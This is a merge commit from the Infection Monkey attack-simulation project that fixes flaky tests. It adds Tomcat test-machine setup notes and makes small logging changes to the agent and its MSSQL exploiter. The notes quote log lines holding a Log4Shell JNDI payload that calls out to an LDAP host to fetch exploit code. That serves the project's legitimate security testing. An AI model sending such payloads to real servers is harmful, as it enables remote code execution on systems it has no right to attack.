Merge pull request #1927 from guardicore/1921-fix-flaky-bb-tests

1921 fix flaky bb tests
This commit is contained in:
Mike Salvatore 2022-05-04 13:28:04 -04:00 committed by GitHub
commit d5f93d21b7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 39 additions and 4 deletions

View File

@ -915,7 +915,40 @@ Accessiable only through <strong>3-45 Powershell</strong> using credentials reus
</tr> </tr>
<tr class="even"> <tr class="even">
<td>Notes:</td> <td>Notes:</td>
<td></td> <td>The jvm's `java.security.egd` variable should be set to `/dev/urandom`,
otherwise the tomcat service can take a very long time to start. Set this by
editing `/usr/tomcat/bin/catalina.sh` and modifying the `JAVA_OPTS` vairable.
See https://jfrog.com/knowledge-base/tomcat-takes-forever-to-start-what-can-i-do/
for more details.
Tomcat sessions that carry over through a reset can cause significant delays
when the tomcat server starts. When the server starts, it attempts to download
the log4shell payload, but the server is no longer listening. This operation
appears to have a 2 minute timeout. You can see it by viewing
`/usr/tomcat/logs/localhost.log`:
```
2022-04-28 16:15:45,541 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Sending application start events
2022-04-28 16:15:45,542 [localhost-startStop-1] INFO org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- ContextListener: contextInitialized()
2022-04-28 16:15:45,542 [localhost-startStop-1] INFO org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- SessionListener: contextInitialized()
2022-04-28 16:15:45,665 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- readObject() loading session E5B004FF35E1CBB44FA8A69AB024941D
2022-04-28 16:15:45,665 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- loading attribute 'foo' with value '${jndi:ldap://10.2.2.121:29573/dn=Exploit}'
2022-04-28 16:17:56,412 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- readObject() loading session 0677AD75F804B1FD4E24AF7F3BFA9DD9
2022-04-28 16:17:56,412 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- loading attribute 'foo' with value '${jndi:ldap://10.2.2.121:39466/dn=Exploit}'
2022-04-28 16:20:07,472 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Starting filters
2022-04-28 16:20:07,472 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Starting filter 'Set Character Encoding'
2022-04-28 16:20:07,477 [localhost-startStop-1] DEBUG org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/examples]- Starting filter 'Compression Filter'
```
Notice the 2-minute gap between the timestamps after "loading attribute 'foo'".
To resolve this, modify /usr/tomcat/conf/context.xml and uncomment the following
setting:
```
<Manager pathname="" />
```
</td>
</tr> </tr>
</tbody> </tbody>
</table> </table>

View File

@ -11,7 +11,7 @@ from .i_credentials_store import ICredentialsStore
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
CREDENTIALS_POLL_PERIOD_SEC = 30 CREDENTIALS_POLL_PERIOD_SEC = 10
class AggregatingCredentialsStore(ICredentialsStore): class AggregatingCredentialsStore(ICredentialsStore):

View File

@ -242,7 +242,8 @@ class MSSQLExploiter(HostExploiter):
self.report_login_attempt(True, user, password) self.report_login_attempt(True, user, password)
cursor = conn.cursor() cursor = conn.cursor()
return cursor return cursor
except pymssql.OperationalError: except pymssql.OperationalError as err:
logger.info(f"Connection to MSSQL failed: {err}")
self.report_login_attempt(False, user, password) self.report_login_attempt(False, user, password)
# Combo didn't work, hopping to the next one # Combo didn't work, hopping to the next one
pass pass

View File

@ -116,7 +116,8 @@ class InfectionMonkey:
logger.info("Another instance of the monkey is already running") logger.info("Another instance of the monkey is already running")
return return
logger.info("Monkey is starting...") logger.info("Agent is starting...")
logger.info(f"Agent GUID: {GUID}")
self._add_default_server_to_config(self._opts.server) self._add_default_server_to_config(self._opts.server)
self._connect_to_island() self._connect_to_island()